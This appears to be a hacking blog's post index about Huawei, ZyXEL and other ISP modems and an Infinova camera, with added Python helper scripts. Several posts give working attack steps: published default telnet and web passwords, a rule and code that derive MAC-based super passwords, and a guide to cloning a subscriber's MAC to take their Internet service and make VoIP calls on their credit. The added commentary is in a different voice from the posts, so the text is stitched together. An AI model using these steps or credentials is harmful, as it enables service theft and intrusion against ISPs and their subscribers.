Thursday, May 20, 2021
Hack: Cracked Super User of Huawei HG8245Q / HG8245Q2 ONT (from Batelco)
by r00tsh3ll at May 20, 2021 0 Comments
Tags: #hacking #Cracking #hashcracking #batelco #HuaweiRouter #HG8245 #Bahrain
Thursday, March 21, 2019
Hacking Huawei HG8245Q / HG8245Q2 ONT (from Batelco) to get Administrator access
Done!
by r00tsh3ll at March 21, 2019 5 Comments
Wednesday, February 13, 2019
Hacking Infinova V1772N-T series PTZ camera (for remote restart)
Issue: the camera's web interface becomes unresponsive after running for a few days. The camera cannot be reached through a web browser even though port 80 is open. The telnet daemon on port 23 is open, but the username and password are unknown. Infinova support was contacted several times with no solution.
Until now the only way to get the camera up and running again was to physically cut power to the camera and power it back up.
Dumped the passwd/shadow files and cracked the root password, which is stored as a traditional DES-based crypt(3) hash (at most 8 significant characters, quick to brute-force).
Solution:
Log in via telnet with the recovered root credentials and reboot the camera remotely, or just restart the webs service (the camera's web server). Note that this works only because the camera has a crackable root password behind an open telnet port: anyone who can reach port 23 gets the same root shell, so the camera should not be reachable from untrusted networks.
After getting root:
root@INFINOVA # cat /proc/mtd
dev: size erasesize name
mtd0: 000c0000 00020000 "mboot1"
mtd1: 00320000 00020000 "kernel1"
mtd2: 00320000 00020000 "kernel2"
mtd3: 00220000 00020000 "initrd1"
mtd4: 00220000 00020000 "initrd2"
mtd5: 04680000 00020000 "rootfs"
mtd6: 0ae40000 00020000 "data"
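Once you have a root shell, the /proc/mtd table above is the map for pulling the firmware off the device. The following is an added example (not the author's code): it parses the listing, computes cumulative offsets and the total flash size, checks that every partition is a whole number of erase blocks, and emits the dd lines to copy each partition out. The sample input is the listing from the session above, embedded as a constructed string; the cumulative offsets assume the partitions tile the chip contiguously in the order listed, which /proc/mtd itself does not guarantee (here the seven sizes add up to exactly 256 MiB, which supports it), so cross-check against the bootloader's partition table before relying on them.

```python
import re

# Constructed sample: the /proc/mtd listing from the camera session above.
PROC_MTD = """\
dev: size erasesize name
mtd0: 000c0000 00020000 "mboot1"
mtd1: 00320000 00020000 "kernel1"
mtd2: 00320000 00020000 "kernel2"
mtd3: 00220000 00020000 "initrd1"
mtd4: 00220000 00020000 "initrd2"
mtd5: 04680000 00020000 "rootfs"
mtd6: 0ae40000 00020000 "data"
"""

# mtdN: <size hex> <erasesize hex> "<name>"
LINE = re.compile(r'^(mtd\d+):\s+([0-9a-f]+)\s+([0-9a-f]+)\s+"([^"]*)"\s*$', re.I)

def parse_proc_mtd(text):
    """Return a list of {dev, name, size, erasesize, offset} in listing order.

    offset is cumulative, i.e. it ASSUMES the partitions are laid out
    contiguously in the order /proc/mtd lists them; /proc/mtd carries no
    offsets of its own.
    """
    parts, offset = [], 0
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # header line or something we do not recognise
        dev, size, erase, name = m.group(1), int(m.group(2), 16), int(m.group(3), 16), m.group(4)
        parts.append({"dev": dev, "name": name, "size": size, "erasesize": erase, "offset": offset})
        offset += size
    return parts

def check_alignment(parts):
    """Names of partitions whose size is not a whole number of erase blocks
    (a sign the listing was misread, or of an odd partition table)."""
    return [p["name"] for p in parts if p["erasesize"] == 0 or p["size"] % p["erasesize"]]

def total_size(parts):
    return sum(p["size"] for p in parts)

def dump_commands(parts, outdir="/tmp"):
    """Shell lines to copy each partition off the device via the /dev/mtdN
    character devices, one erase block per read. On NAND with bad blocks dd
    will stop with an I/O error; use nanddump from mtd-utils there instead."""
    return [f'dd if=/dev/{p["dev"]} of={outdir}/{p["name"]}.bin bs={p["erasesize"]}'
            for p in parts]

if __name__ == "__main__":
    parts = parse_proc_mtd(PROC_MTD)
    for p in parts:
        print(f'{p["dev"]:5} {p["name"]:10} off=0x{p["offset"]:08x} size=0x{p["size"]:08x} '
              f'({p["size"] / 2**20:.2f} MiB)')
    print(f"total 0x{total_size(parts):x} ({total_size(parts) / 2**20:.0f} MiB)")
    print("misaligned:", check_alignment(parts))
    print("\n".join(dump_commands(parts)))
```

The duplicated kernel/initrd slots (kernel1/kernel2, initrd1/initrd2) are the usual A/B layout; if you later want to patch the image, note that rootfs alone is 70.5 MiB and that the erase block is 128 KiB, so any rewrite has to be block-aligned.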
END!
by r00tsh3ll at February 13, 2019 1 Comments
Sunday, January 3, 2016
Tuesday, July 21, 2015
Hacking G-Share2 (Satellite Card Sharing Client) Subscription
by r00tsh3ll at July 21, 2015 3 Comments
Monday, November 10, 2014
Zain Broadband 2.0 (Security flaws): Free Internet/VoIP calls with Huawei Echolife BM635
- Log in to the Huawei Echolife BM635 via telnet: telnet 192.168.1.1
- Enter the username and password, then press ENTER
username: huawei
password: Adt26BnE
- At the ATP prompt, type setallmacaddr XX:XX:XX:XX:XX:XX and press ENTER (where XX:XX:XX:XX:XX:XX is a valid WAN MAC address)
e.g. ATP> setallmacaddr 4C:54:99:12:12:12
- Type restoredef and press ENTER
- The Huawei BM635 will restart with the new MAC address and the default configuration.
- If done correctly, you will be connected to the Internet (with the subscriber's IP address).
- Point your browser to 192.168.1.1
- Log in using admin:2gzVL6MT
- Click on Basic > VoIP > SIP User
- Enter the SIP Super Password (see the "Zain Broadband 2.0 (Wimax): NEW Admin Password" post below), then enter a valid VoIP number in the SIP ID and Username fields
Note: SIP ID and Username are the same, i.e.
SIP ID: 13644272
Username: 13644272
Password: !@#$%^&*()_
- Click on Apply, then on Register
Note: This will only work if you are using Zain WiMAX
- If done correctly, you can call for free (using the subscriber's call credit)
END!
by Anonymous at November 10, 2014 3 Comments
Tags: Zain Bahrain, Zain Broadband 2.0, Zain VoIP, Zain Wimax Hack
Monday, November 3, 2014
Zain Broadband 2.0 (Wimax): NEW Admin Password
Get Full Access to your device (OWN IT)
WebGUI Login Detail
Username: admin
Password: 2gzVL6MT
Telnet Login Detail
Username: huawei
Password: Adt26BnE
SIP Super Password
Password: Reverse WAN MAC + R3bKaA
Wimax Super Password
Password: Reverse WAN MAC + hUm2A786
For Example
If the WAN MAC is 84:A2:5F:3D:CD:2E
then the Reverse WAN MAC is E2DCD3F52A48 (the 12 hex digits with the colons removed, written backwards character by character), so the SIP Super Password is E2DCD3F52A48R3bKaA and the Wimax Super Password is E2DCD3F52A48hUm2A786.
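The derivation rule, as an added example that is not the post's own code: it normalises the MAC (colon, dash, dotted or bare form), reverses the 12 hex characters character-wise (byte-wise reversal of the post's example would give 2ECD3D5FA284, which is not what the post shows), appends the fixed suffix, and adds an audit check that tells whether a given password is still the MAC-derived factory default. The two suffixes are taken from the post; the function names and the input-format handling are this example's assumptions.

```python
import re

# Suffixes as given in the post above; everything else here is this example's own.
SIP_SUFFIX = "R3bKaA"
WIMAX_SUFFIX = "hUm2A786"

def normalise_mac(mac):
    """Accept 84:A2:5F:3D:CD:2E, 84-A2-5F-3D-CD-2E, 84a2.5f3d.cd2e or bare hex
    and return the 12 upper-case hex digits; raise ValueError otherwise."""
    digits = re.sub(r"[:\-.\s]", "", mac).upper()
    if not re.fullmatch(r"[0-9A-F]{12}", digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    return digits

def reverse_mac(mac):
    """The post's 'Reverse WAN MAC': the 12 hex characters written backwards,
    character by character (not byte by byte)."""
    return normalise_mac(mac)[::-1]

def super_password(mac, kind):
    """kind is 'sip' or 'wimax'; returns reverse_mac(mac) + the fixed suffix."""
    suffix = {"sip": SIP_SUFFIX, "wimax": WIMAX_SUFFIX}[kind]
    return reverse_mac(mac) + suffix

def is_mac_derived(password, mac):
    """Audit helper: True if the password is one of the two MAC-derived
    defaults for this device, i.e. it was never changed from the factory rule."""
    return password in (super_password(mac, "sip"), super_password(mac, "wimax"))

if __name__ == "__main__":
    mac = "84:A2:5F:3D:CD:2E"  # the post's worked example
    print(reverse_mac(mac))              # E2DCD3F52A48, as the post states
    print(super_password(mac, "sip"))
    print(super_password(mac, "wimax"))
```

The security point is in the audit helper rather than the derivation: a password computed from the WAN MAC by a fixed rule has exactly as much secrecy as the MAC, which is printed on the device label and visible to every host on the LAN, so any CPE whose admin password still matches is_mac_derived should be treated as having no admin password at all.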
Screenshots
by Anonymous at November 03, 2014 3 Comments
Tags: Hardware Hacking, Huawei BM635, Zain Broadband 2.0, Zain Wimax
Wednesday, October 19, 2011
DV-250 WiMAX modem boot log
Ethernet eth0: MAC address 00:15:f2:0d:4f:9b
IP: 192.168.0.8/255.255.255.0, Gateway: 192.168.0.1
Default server: 192.168.0.1
RedBoot(tm) bootstrap and debug environment [ROMRAM]
Non-certified release, version UNKNOWN - built 20:17:12, Aug 11 2009
Platform: MT7108APP (ARM9)
Copyright (C) 2000, 2001, 2002, 2003, 2004 Red Hat, Inc.
Copyright (C) 2003, 2004, 2005, 2006 eCosCentric Limited
RAM: 0x00000000-0x02ffc000, [0x0002dc18-0x02fe9000] available
FLASH: 0x60000000 - 0x60e80000, 232 blocks of 0x00010000 bytes each.
RedBoot> mfill -b 0x80000008 -l 4 -4 -p 0x3D
RedBoot> mfill -b 0x80000008 -l 4 -p 0xffffffff -4
RedBoot> cache on
RedBoot> fs mount -d /dev/flash1 -t jffs2 /flash
RedBoot> fs cd /flash
RedBoot> load -m file -b 0x600000 -r zImage
Raw file loaded 0x00600000-0x0075444b, assumed entry at 0x00600000
RedBoot> load -m file -b 0x1000000 -r initrd
Raw file loaded 0x01000000-0x01484fff, assumed entry at 0x01000000
RedBoot> exec -z -b 0x600000
Uncompressing Linux............................................................................................ done, booting the kernel.
Linux version 2.6.10_mvl401-versatile926ejs (root@Ubuntu-WS) (gcc version 3.4.4) #1 Mon Nov 9 21:27:14 CST 2009
CPU: ARM926EJ-Sid(wb) [41069265] revision 5 (ARMv5TEJ)
CPU0: D VIVT write-back cache
CPU0: I cache: 16384 bytes, associativity 4, 32 byte lines, 128 sets
CPU0: D cache: 16384 bytes, associativity 4, 32 byte lines, 128 sets
Machine: MT7108
Memory policy: ECC disabled, Data cache writeback
Built 1 zonelists
Kernel command line: console=ttyS1,115200n1 mem=48M@0M initrd=0x1000000,0x800000 ramdisk_size=8192 root=/dev/ram
PID hash table entries: 256 (order: 8, 4096 bytes)
Console: colour dummy device 80x30
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Memory: 48MB = 48MB total
Memory: 37400KB available (2399K code, 502K data, 104K init)
Mount-cache hash table entries: 512 (order: 0, 4096 bytes)
CPU: Testing write buffer coherency: ok
spawn_desched_task(00000000)
desched cpu_callback 3/00000000
ksoftirqd started up.
desched cpu_callback 2/00000000
desched thread 0 started up.
checking if image is initramfs...it isn't (bad gzip magic numbers); looks like an initrd
Freeing initrd memory: 8192K
NET: Registered protocol family 16
PCI: bus0: Fast back to back transfers enabled
SCSI subsystem initialized
usbcore: registered new driver hub
NetWinder Floating Point Emulator V0.97 (double precision)
Registering GDB sysrq handler
Installing knfsd (copyright (C) 1996 [email protected]).
JFFS2 version 2.2. (NAND) (C) 2001-2003 Red Hat, Inc.
Initializing Cryptographic API
Serial: 8250/16550 driver $Revision: 1.90 $ 2 ports, IRQ sharing disabled
ttyS1 at MMIO 0x800a0000 (irq = 7) is a 16550A
io scheduler noop registered
io scheduler anticipatory registered
io scheduler deadline registered
io scheduler cfq registered
RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize
PPP generic driver version 2.4.2
PPP Deflate Compression module registered
PPP BSD Compression module registered
MPPE/MPPC encryption/compression module registered
Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2
ide: Assuming 50MHz system bus speed for PIO modes; override with idebus=xx
elevator: using anticipatory as default io scheduler
Initializing USB Mass Storage driver...
usbcore: registered new driver usb-storage
USB Mass Storage support registered.
mice: PS/2 mouse device common for all mice
u32 classifier
OLD policer on
NET: Registered protocol family 2
IP: routing cache hash table of 512 buckets, 4Kbytes
TCP: Hash tables configured (established 4096 bind 8192)
ip_conntrack version 2.1 (384 buckets, 3072 max) - 360 bytes per conntrack
ip_tables: (C) 2000-2002 Netfilter core team
ipt_recent v0.3.1: Stephen Frost
ClusterIP Version 0.6 loaded successfully
Initializing XFRM netlink socket
NET: Registered protocol family 1
NET: Registered protocol family 17
NET: Registered protocol family 15
Bridge firewalling registered
802.1Q VLAN Support v1.8 Ben Greear
All bugs added by David S. Miller
RAMDISK: cramfs filesystem found at block 0
RAMDISK: Loading 4628KiB [1 disk] into ram disk... done.
VFS: Mounted root (cramfs filesystem) readonly.
Freeing init memory: 104K
init started: BusyBox v1.6.1 (2009-11-09 21:34:32 CST) multi-call binary
starting pid 727, tty '': '/etc/rcS'
[WATCHDOG] check_umac_health=on timeout=31 interval=5
gpio: module license 'unspecified' taints kernel.
init mod-gpio
init mod-ledbutton
register fastpath id=3 net_device=c2b03800 name=vth%d if_type=2 hard_header_len=14
Searching for RedBoot partition table in MTDCCIF at offset 0x30000
4 RedBoot partitions found on MTD device MTDCCIF
Creating 4 MTD partitions on "MTDCCIF":
0x00000000-0x00030000 : "RedBoot_arm9"
rfd_ftl: no RFD magic found in 'RedBoot_arm9'.
0x00030000-0x0003f000 : "FIS directory"
0x0003f000-0x00040000 : "RedBoot config"
0x00040000-0x00e40000 : "etc_plus"
rfd_ftl: no RFD magic found in 'etc_plus'.
mtd_partitions add
mount etc -> mtd3
init mod-ksocket
******************************************************************
******************************************************************
insmod hostdriver.ko
******************************************************************
******************************************************************
wmx0: Dropping NETIF_F_SG since no checksum feature.
register fastpath id=1 net_device=c2df8000 name=wmx0 if_type=1 hard_header_len=14
register fastpath id=0 net_device=c2d9dc00 name=eth%d if_type=0 hard_header_len=14
eth0: IC+ IP101A
8139too Fast Ethernet driver 0.9.27
modprobe: module star_ether not found
modprobe: failed to load module star_ether
clock is 40MHz
DPLL = c3020
Initializing MUSB Driver (x.x) [debug=0][gadget=no][otg=no] REV=1
direct_bus_init 259: Probing direct bus [direct=1]
MGC_LinuxInitController 2058: MUSB Driver [Base Address(PA)=0xc3846000]
[IRQ = 13]
[pDevice=bf047948]
MGC_HdrcInit 1048: ConfigData=0xdf (UTMI-16, dyn FIFOs, bulk combine, bulk split, HB-ISO Rx, HB-ISO Tx, SoftConn)
MGC_HdrcInit 1074: xDRC version 2.0
end=0 TXRX sz=3 addr=0 offset=0
end=1 TX sz=6 addr=8 offset=64
end=2 RX sz=6 addr=72 offset=576
end=3 TX sz=3 addr=136 offset=1088
end=4 RX sz=3 addr=144 offset=1152
MGC_LinuxInitController 2150: End 00: Shared FIFO TxSize=0040/RxSize=0040
MGC_LinuxInitController 2150: End 01: FIFO TxSize=0200/RxSize=0000
MGC_LinuxInitController 2150: End 02: FIFO TxSize=0000/RxSize=0200
MGC_LinuxInitController 2150: End 03: FIFO TxSize=0040/RxSize=0000
MGC_LinuxInitController 2150: End 04: FIFO TxSize=0000/RxSize=0040
musb-hcd usb0: new USB bus registered, assigned bus number 1
mgc_init_bus 1934: Registered new bus @c17338e0
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
[Starting] sncfgd ... ----------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Congratulation, WMM initialized successfully
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OK
[Starting] networking
device eth0 entered promiscuous mode
br0: port 1(eth0) entering learning state
br0: topology change detected, propagating
br0: port 1(eth0) entering forwarding state
.
[Starting] FW/NAT
ip_conntrack_pptp version 2.1 loaded
ip_nat_pptp version 2.0 loaded
.
[Strating] syslog and klog daemon ... OK
[wifi] Starting....
WLAN_LOCK=1
[wifi] initial wifi config file.
rtusb init --->
usbcore: registered new driver rt2870
ifconfig: SIOCGIFFLAGS: No such device
usbcore: deregistering driver rt2870
<--- rtusb exit [wifi] The device is not ready. [wifi] Failed to generate wifi config file. rtusb init --->
usbcore: registered new driver rt2870
WLAN_AUTO_SSIDWEP=,
WLAN_LOCK=0
Starting SW RTCThu Jan 1 00:04:00 UTC 1970
Thu Jan 1 08:06:00 LST 1970
SW_RTC_TIMESTAMP=010100061970.00
--- to install system time log (SW RTC)[Translating] crontab ... OK
.
[Starting] ssh server OK
[Starting] httpd serverWMX_AUTO_RECONNECT=1
/bin/lighttpd /usr/www_gemtek/lighttpd.conf ... lighttpd: copy conf filecp: cannot stat '/usr/www_gemtek/p1nadmin': No such file or directory
cp: cannot stat '/usr/www_gemtek/p1nadminJ': No such file or directory
.
OK
[Starting] httpd server/bin/mini_httpd.elf /etc/conf/mini_httpd.conf ... .
OK
[Starting] https server/usr/trans/httpsd.trans ... /bin/mini_httpd.elf /etc/conf/mini_httpsd.conf ... .
OK
Starting miniupnpd.
[Starting] telnet server/usr/sbin/telnetd -p 23 ... OK
[Strating] dhcp server ... /usr/trans/dhcpd.trans ... /usr/sbin/udhcpd /etc/conf/udhcpd.conf ... OK
/tmp/rcS: line 1: /etc/rc.d/S07networking_wan: Permission denied
[Starting] wimac upgrade checking ...
[Strating] zebra daemon ... /usr/trans/sroute.trans ... /usr/sbin/zebra -d -f /etc/conf/zebra.conf -i /var/run/zebra.pid ... OK
[Strating] rip daemon ... rip daemon was configured to be disabled ... FAIL
[Strating] VoIP ...
modprobe vdspsw kernel modules ...
probe info: pcm version=1, slic_typ=3215, chan_num=1, call/session_num=4
control PSTN-Relay
init mod-syss
init mod-pcm2
pcm_ver = 1
pcm_chan_no = 1
pcm_mmap_flushall = 0
pcm_mangle = 1
pcm_dsp_log_sz = 8000
init mod-lec, ch=1 Nov 9 2009 15:47:45
Init mod-drc drc_ch_num=1 Nov 9 2009 15:47:51
DSP: <1>init mod-dsp
init mod-slic3
start init slic=4294940183l
probe channel num=1
Silicon driver:si321x 0 reg 0 = C3 reg1 = 88
Silicon driver:si321x loading indirect registers
Silicon driver:si321x 0 checking for foreign volt source
Silicon driver:si321x 0 bringing up vbat 0
Silicon driver:si321x running cal 1
Silicon driver:si321x running cal 2
Silicon driver:si321x 0 cmdac and difdac cal start
Silicon driver:si321x manual cal ring starting
Silicon driver:si321x manual cal tip starting
Silicon driver:si321x 0 long balance cal starting
Silicon driver:si321x 0 long balance cal waiting for active line(s) to charge
Silicon driver:si321x 0 long balance cal executing
Silicon driver:si321x 0 cal sequence finished
Silicon driver:Si321x_PCMStart
dtnf init ch=1
DTMF_MAIN: dtmf_main_init: add to pcm engine, 0
FMTD: Enable Channel 0
SLIC2: <1>init mod-fxs3
init slic end=4294940475l
modprobe slic2 result=0
init mod-ortp
oRTP-0.13.1 initialized.<1>init mod-foip
init mod-acodec
init mod-vdsp for 1 channels 4 sessions
VDSP V 2.0.4 (Nov 9 2009 15:49:49)
voip_insert_modules result=0 ...
reset cfg channel number to 1
voip.cfg exist
voip_feature.cfg exist
voip.conf exist
voip_feature.conf exist
[Translating] crontab ...init voipconf_init, Nov 9 2009 16:04:51
OK
port=5060
System Info: Max Line Number:1, Max Account Number:1, Max Call Number:4
Build @ Date:Nov 9 2009, Time:16:05:08
VOIP_SERVER_PROXY_ADDR=10.109.2.6
VOIP_SERVER_PROXY_PORT=5060
VOIP_SERVER_REGISTRAR_ADDR=10.109.2.6
VOIP_SERVER_REGISTRAR_PORT=5060
VOIP_SERVER_OUTBOUND_ADDR=10.109.2.6
VOIP_SERVER_OUTBOUND_PORT=5060
VOIP_COMM_SIP_DOMAIN=10.109.2.6
[Starting] crond ... OK
[Starting] auto reconnect to BS ... OK
starting pid 1748, tty '': '/sbin/getty'
mt7xxx login:
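A boot log like the one above is mostly read for its attack surface: which daemons the init script brings up, on which ports and binaries, which ones fail, and what configuration the scripts echo to the console. The following is an added example (not from the post) that triages it. The sample is a constructed subset of lines copied from the log above; the regexes, field names and the list of cleartext admin services are this example's own choices. The init script misspells "Starting" as "Strating" on some lines, so the matcher accepts both.

```python
import re

# Constructed sample: a subset of lines copied from the DV-250 boot log above.
BOOT_LOG = """\
Linux version 2.6.10_mvl401-versatile926ejs (root@Ubuntu-WS) (gcc version 3.4.4) #1 Mon Nov 9 21:27:14 CST 2009
init started: BusyBox v1.6.1 (2009-11-09 21:34:32 CST) multi-call binary
[Starting] ssh server OK
[Starting] httpd serverWMX_AUTO_RECONNECT=1
/bin/lighttpd /usr/www_gemtek/lighttpd.conf ... lighttpd: copy conf filecp: cannot stat '/usr/www_gemtek/p1nadmin': No such file or directory
[Starting] httpd server/bin/mini_httpd.elf /etc/conf/mini_httpd.conf ... .
[Starting] https server/usr/trans/httpsd.trans ... /bin/mini_httpd.elf /etc/conf/mini_httpsd.conf ... .
[Starting] telnet server/usr/sbin/telnetd -p 23 ... OK
[Strating] dhcp server ... /usr/trans/dhcpd.trans ... /usr/sbin/udhcpd /etc/conf/udhcpd.conf ... OK
/tmp/rcS: line 1: /etc/rc.d/S07networking_wan: Permission denied
[Strating] zebra daemon ... /usr/trans/sroute.trans ... /usr/sbin/zebra -d -f /etc/conf/zebra.conf -i /var/run/zebra.pid ... OK
[Strating] rip daemon ... rip daemon was configured to be disabled ... FAIL
VOIP_SERVER_PROXY_ADDR=10.109.2.6
VOIP_SERVER_REGISTRAR_ADDR=10.109.2.6
mt7xxx login:
"""

# The init script prints "[Starting]" and, on some lines, "[Strating]".
START = re.compile(r"^\[(?:Starting|Strating)\]\s*(.+)$")
ERROR = re.compile(r"Permission denied|cannot stat|No such file|not found|failed to")

# Admin interfaces that carry credentials without transport encryption.
CLEARTEXT_ADMIN = {"telnet", "httpd"}

def triage(log):
    """Pull versions, announced services, console-echoed config and errors
    out of a boot log; returns a plain dict."""
    facts = {"kernel": None, "busybox": None, "services": [], "config": {}, "errors": []}
    for line in log.splitlines():
        line = line.rstrip()
        m = re.match(r"^Linux version (\S+)", line)
        if m:
            facts["kernel"] = m.group(1)
            continue
        m = re.search(r"BusyBox v([\d.]+)", line)
        if m:
            facts["busybox"] = m.group(1)
            continue
        m = START.match(line)
        if m:
            body = m.group(1)
            # Status is the tail of the line; some daemons report on a later line.
            status = "FAIL" if body.endswith("FAIL") else "OK" if body.endswith("OK") else "?"
            port = re.search(r"-p\s+(\d+)", body)
            facts["services"].append({
                "name": body.split()[0],            # ssh, httpd, telnet, rip, ...
                "status": status,
                "binaries": re.findall(r"/\S+", body),
                "port": int(port.group(1)) if port else None,
            })
            continue
        m = re.match(r"^([A-Z][A-Z0-9_]+)=(.*)$", line)
        if m:
            facts["config"][m.group(1)] = m.group(2)
            continue
        if ERROR.search(line):
            facts["errors"].append(line)
    return facts

def cleartext_admin_services(facts):
    """Names of cleartext admin services the script started and did not report as failed."""
    return sorted({s["name"] for s in facts["services"]
                   if s["name"] in CLEARTEXT_ADMIN and s["status"] != "FAIL"})

if __name__ == "__main__":
    f = triage(BOOT_LOG)
    print("kernel:", f["kernel"], " busybox:", f["busybox"])
    for s in f["services"]:
        print(f'{s["name"]:8} {s["status"]:4} port={s["port"]} {s["binaries"]}')
    print("config:", f["config"])
    print("errors:", len(f["errors"]))
    print("cleartext admin:", cleartext_admin_services(f))
```

Read against the full log, this gives the practitioner's summary in a few lines: a 2.6.10 kernel and BusyBox 1.6.1 built in 2009, telnetd on port 23, two HTTP daemons plus HTTPS, SSH, a routing daemon, a VoIP proxy address pushed into the configuration, and a WAN networking script that never ran because of a permissions error.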
END!
by Anonymous at October 19, 2011 5 Comments
Tags: DV-250 modem
Sunday, October 16, 2011
Friday, October 7, 2011
WiMAX modems: Whose MAC can be changed
BM635 (tested)
BM625 (similar to BM635)
BM622 (tested)
BM622i (tested)
and many more....
(almost all Huawei Wimax modems)
==================
ZyXEL
HES-319M (tested)
MAX-318M (tested)
==================
Motorola
CPEi 35775 (tested [needs device certificate])
==================
Most ISPs use the modem's MAC address for authentication, so any modem presenting a valid/active MAC is allowed onto the network. By changing the MAC it is therefore possible to get free Internet.... The flaw is that a MAC address is an identifier, not a secret: it is printed on the device label and visible to every host on the LAN, so it cannot serve as a credential. The Motorola entry above shows the countermeasure: where the network also requires a per-device certificate, a cloned MAC alone is not enough.
by Anonymous at October 07, 2011 143 Comments
Tags: WIMAX MAC change
Thursday, September 22, 2011
A view from top of Bahrain Chamber of Commerce & Industry
by Root Shell at September 22, 2011 0 Comments
Tags: BCCI